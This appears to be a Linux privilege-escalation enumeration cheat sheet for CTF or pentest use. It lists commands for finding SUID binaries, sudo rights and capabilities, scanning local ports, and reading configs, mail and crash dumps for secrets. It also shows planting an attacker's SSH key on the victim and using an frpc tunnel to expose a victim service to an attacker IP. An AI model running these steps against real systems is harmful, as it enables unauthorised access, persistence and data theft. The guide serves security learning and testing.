Linux

After gaining user, you can run these checks to discover more information

You can always run linpeas.sh, but if you don't want to deal with the text diarrhea, you can run these checks instead

Permissions

Check user and group permissions

Check your identity and find files and directories you have permissions to and GTFO - https://gtfobins.github.io/

$ id
$ find / -user <user> -type f 2>/dev/null
$ find / -user <user> -type d 2>/dev/null
$ find / -group <group> -type f 2>/dev/null
$ find / -group <group> -type d 2>/dev/null

Check Sudo permissions

Shows all command this user can run as sudo

$ sudo -l

Check for configs that are preserved with env_keep which can be used to preload custom files

Check SUID and SGID

Find all binaries with sticky bit set and GTFO - https://gtfobins.github.io/#+suid

$ find / -perm -u=s -type f 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null

Check Capabilities

Gets capabilities of binaries and GTFO - https://gtfobins.github.io/#+capabilitiese

$ getcap -r / 2>/dev/null

Discovering Services

Check Local Services

Check for local services running on the victim machine

$ nc -zv 127.0.0.1 1-65535 2>&1 | grep -v "refused"

Find all listening services and use SSH port forwarding to forward the service to your machine

$ ss -tuan | grep LISTEN

On the victim machine, add the attacker's public key in /home/victim/.ssh/authorized_keys

For SSH tunneling, run this on the attacker

$ ssh -L <local port>:<victim service>:<victim port> <victim>@<ip>

Or use FRPC to expose the local service directly. In the example below, we expose a serivce running on port 3001 on the victim to port 6000 globally

GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.GitHub

Releases · fatedier/frpGitHub

Copy frpc and frpc.ini to the victim and run:

# frpc.ini
[common]
server_addr = <attacker IP>
server_port = 7000

[expose]
type = tcp
local_ip = 127.0.0.1
local_port = 3001
remote_port = 6000

$victim > ./frpc -c ./frpc.ini

On the attacker server, start frps

$attacker > ./frps -p 7000

Check Cronjobs

Run pspy64 to check running process (likely cron)

https://github.com/DominicBreuker/pspy

Information from Artifacts

Check configuration files in

• /etc/mysql/my.cnf

• /etc/apache2/apache2.conf

• /etc/apache2/sites-enabled/000-default.conf

• etc/nginx/sites-available/default.conf

• etc/nginx/nginx.conf

Check mail

• /var/mail

• /var/spool/mail

Check interesting folders

• /opt

• /var/backups

Check for most recently modified files

$ ls -ltr
$ find . -mtime -1 #files changed in the last day
$ find . -type f -mmin -120 -mmin +60 #files changed less than 120 mins, and more than 60 mins ago

Check Audit Log

If in group adm, check

• /var/logs/audit

Run aureport --help to visualize the audit logs

Check mounts

Check the mounts /dev/sda*

Check library loads in Binary

Check binaries being used that do not use absolute path. We can highjack the binaries loaded using relative paths

$ ltrace <binary> 2> out

Check memory dump

Kill the running process

$ kill -BUS <pid>

Get the data from the crash log

$ apport-unpack /var/crash/_opt_count.1000.crash /tmp/crashed
$ strings /tmp/crashed/CoreDump

Check Processes running in /proc

for val in range(1,1000):
    try:
        with open("/proc/"+str(val)+"/cmdline", 'r') as f:
            lines = f.readlines()
            print(lines)
    except:
        pass